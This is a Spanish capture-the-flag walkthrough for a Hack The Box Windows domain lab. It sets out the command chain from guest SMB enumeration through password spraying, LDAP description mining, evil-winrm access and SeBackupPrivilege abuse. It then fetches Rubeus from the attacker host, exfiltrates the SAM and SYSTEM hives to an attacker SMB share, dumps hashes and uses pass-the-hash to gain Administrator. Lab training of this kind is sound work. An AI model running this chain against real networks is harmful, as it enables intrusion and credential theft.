smb https://ctftalks.com/t/cicada-discussion-hints-htb/1411/7 hacemos un scaneo con Nmap y luego vemos que tiene el servicio ldap y smb, vamos a listar usuarios por el protocolo smb
nxc smb 10.10.11.35 -u 'guest' -p ''
- el usuario
guest
extiste, vamos a listar las cosas compartidas
nxc smb 10.10.11.35 -u 'guest' -p '' --shares
dentro de hr tienemos una password para un usuario vamos a probar a listar usuarios y luego vamos a probar la password para cada uno de ello a ver de cual es
nxc smb 10.10.11.35 -u 'guest' -p '' --rid-brute | grep -E "*User*"
vamos a pasar esos a un diccionario y vamos a hacer fuerza bruta
nxc smb 10.10.11.35 -u users -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-succes
ahora que tenemos un usuario vamos a hacer uso de ldapsearch para ver las descripciones de los usuario por si hubiera algo
ldapsearch -x -H ldap://10.10.11.35 -b dc=cicada,dc=htb -D "michael.wrightson@cicada.htb" -w 'Cicada$M6Corpb*@Lp#nZp!8' '(description=*password*)'
ahora que tenemos otro usuario vamos a intentar ver mas cosas en smb
nos decargamos el script y dentro tiene la password de otro usuario, el nos nos ayudara a conectarnos al servidor con evil-winrm
evil-winrm -i 10.10.11.35 -u emily.oscars
listamos nuestros privilegios
para ver mas privilegios
net user emily.oscars
vamos a ver que usuarios son admin (en este caso solo Administrator)
net group "Domain Admins" /domain
y vemos que tenemos
SeBackupPrivilege
vamos ha hacer uso de esto para poder volcar el archivo SAM en nuestro equipo y luego hacerle fuerza bruta, vamos a ver si el usuarios Administrator
se ha autenticado en el equipo alguna vez
teniendo en cuenta que este servidor esta haciedo uso de kerberos vamos hacer uso de Rubeus.exe
y en el otro equipo
curl 10.10.14.202/Rubeus.exe -o Rubeus.exe
en mi caso rubus no va, voy a mandarme una revershell con para poder usar meterpreter
ahora si investigamos podemos ver que la carpeta documents tiene el sam y system
los pasamos a nuestro equipo haciendo un servidor smb
sudo impacket-smbserver smbFolder $(pwd) -smb2support
y ahora lo pasamos desde la victima
mv ./* \\10.10.14.202\smbFolder
y samos los hashes
impacket-secretsdump -sam sam -system system LOCAL
otra forma
samdump2 system sam -o hash
ahora podemos hacer Pass-The-Hash Attacks
evil-winrm -i 10.10.11.35 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341
y ya somos root